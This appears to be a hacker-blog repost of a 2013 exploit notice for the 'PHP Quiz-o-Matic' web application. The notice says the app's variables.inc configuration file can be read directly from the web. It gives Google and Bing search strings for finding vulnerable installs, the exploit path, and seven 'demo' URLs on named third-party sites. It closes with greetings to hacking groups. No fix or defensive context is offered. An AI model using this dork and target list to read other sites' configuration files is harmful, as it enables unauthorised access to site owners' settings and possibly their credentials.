RetnO
today : | at : (GMT+7)
Server IP : (Unknown) | Your IP :
safemode : ON
> / home / retno / public_html / retnohack.blogspot.com / drwxr-x--- [ home ]
name author perms com modified label

PHP Quiz - Read Config Vulnerability RetnO rwxr-xr-x 0 10:27 AM

Filename PHP Quiz - Read Config Vulnerability
Permission rw-r--r--
Author RetnO
Date and Time 10:27 AM
Label
Action
Author: RetnOHacK
Team: Procoderz Team Albania
Exploit Title:  php quiz o matic by matt hughes Read Config Vulnerability
Date: 26-03-2013
Category: WebApp
Google Dork: php quiz o matic by matt hughes
Bing Drok: Warning: file(): Filename cannot be empty in  /variables.inc
Tested on: Linux

Exploit:
site.xx/path/quiz/variables.inc

Demo:
http://www.nvak.no/misc/quiz/variables.inc
http://www.ac3.org/KKY_News/quizzes/variables.inc
http://www.nienteansia.it/quiz/variables.inc
http://www.tropicalweather.net/variables.inc
http://www.noanxiety.com/quizzes/variables.inc
http://www.brownteal.com/site/variables.inc
http://www.gomyson.com/mytest/variables.inc

Greetz: Hackforums.al, Madleets, WildClique, KHS, **RoAd_KiLlEr**,
TUNISIAN CYBER, Danzel, Dr.Z0mbie, н4χ0яℓ1ƒ3,
Hitcher, Cyberw0rM, CyberCoders, BackdoorMan, OverLoad, and all my friends

source : http://www.exploit4arab.net/exploits/453